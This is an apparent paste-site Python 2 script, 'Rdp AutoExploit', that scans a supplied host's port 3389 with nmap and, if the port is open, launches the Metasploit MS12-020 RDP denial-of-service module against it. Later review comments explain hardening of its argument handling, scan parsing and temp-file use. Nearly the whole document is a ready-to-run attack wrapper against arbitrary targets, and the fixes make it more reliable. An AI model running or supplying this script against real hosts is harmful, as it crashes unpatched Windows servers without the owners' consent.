stoker

Rdp Exploit

Feb 19th, 2014
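#!/usr/bin/python
# jutthaxor@gmail.com
#
# Python 2 wrapper script. It refuses to run unless the effective user is
# root, takes exactly one command-line argument (the target host), runs nmap
# against TCP port 3389 on that host and, if nmap reports the port open,
# hands the host to msfcli with the Metasploit module
# auxiliary/dos/windows/rdp/ms12_020_maxchannelids.
#
# Review notes on this revision:
#   * The target host is validated and passed to the child processes as an
#     argv list. The original interpolated sys.argv[1] into shell=True
#     command strings, so any shell metacharacter in the argument was
#     executed as root.
#   * The nmap report is read from a pipe. The original wrote it to the
#     fixed path /tmp/nmap.txt as root, which a local user could pre-create
#     as a symlink, and never closed the file handle.
#   * The port test now uses the regex result. The original tested the raw
#     file contents (`if not found`), which are non-empty whenever nmap
#     writes its report, so the closed-port branch was effectively dead.
import os,sys,re,subprocess
print '''
+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+-+
|R|d|p| |A|u|t|o|E|x|p|l|o|i|t| |B|y| |S|t|o|k|e|r|
+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+-+
[!] Author - Muhammad Adeel aka Stoker
[!] Mail   - jutthaxor@gmail.com
[!] Greetz - Team Xploiters

[!] P.S : This Exploit is Based on => auxiliary/dos/windows/rdp/ms12_020_maxchannelids <='''
# NOTE(review): nothing below visibly requires root; running both child
# processes as root widens the impact of any argument-handling mistake.
# Confirm whether this check is needed at all.
if os.getuid() != 0:
    print '\n\t\t[UnSufficient Priviliges]Error:You are Not Root!\n'
    sys.exit(1)
def help():
  """Print the usage text and exit with status 1 unless exactly one argument was given.

  The name is kept from the original script; it shadows the builtin help().
  """
  if len(sys.argv) != 2:
    print """
   [!]Usage -   ./script.py [Target Host]
   [!]Example - ./script.py 127.0.0.1\n"""
    sys.exit(1)
help()
RHOST = sys.argv[1]
# Accept only hostname / dotted-quad characters and require an alphanumeric
# first character, so the value can never be read as a command-line option
# by the tools it is passed to.
if not re.match(r'[A-Za-z0-9][A-Za-z0-9.-]*\Z', RHOST):
    print '\n[!] Target Host must be a hostname or IPv4 address.'
    sys.exit(1)
try:
    # argv list, no shell: RHOST reaches nmap as a single argument.
    scan = subprocess.Popen(['nmap', '-p3389', RHOST], stdout=subprocess.PIPE)
except OSError:
    print '\n[!] Could not run nmap.'
    sys.exit(1)
found = scan.communicate()[0]
# Echo the report so the operator still sees the scan output on the terminal.
sys.stdout.write(found)
# An open 3389/tcp only shows that the service is reachable; it says nothing
# about whether the host is patched against MS12-020.
port_open = re.search(r'3389[/]tcp\sopen', found)
if not port_open:
  print "\n[!] Port 3389 is Close."
  sys.exit(1)
print '\n[!] Port Is Open. Let me try AutoRdp Exploit'
try:
    subprocess.Popen(['msfcli',
                      'auxiliary/dos/windows/rdp/ms12_020_maxchannelids',
                      'RHOST=%s' % RHOST,
                      'RPORT=3389',
                      'E']).wait()
except OSError:
    print '\n[!] Could not run msfcli.'
    sys.exit(1)
raw_input('Hit Enter to Exit.')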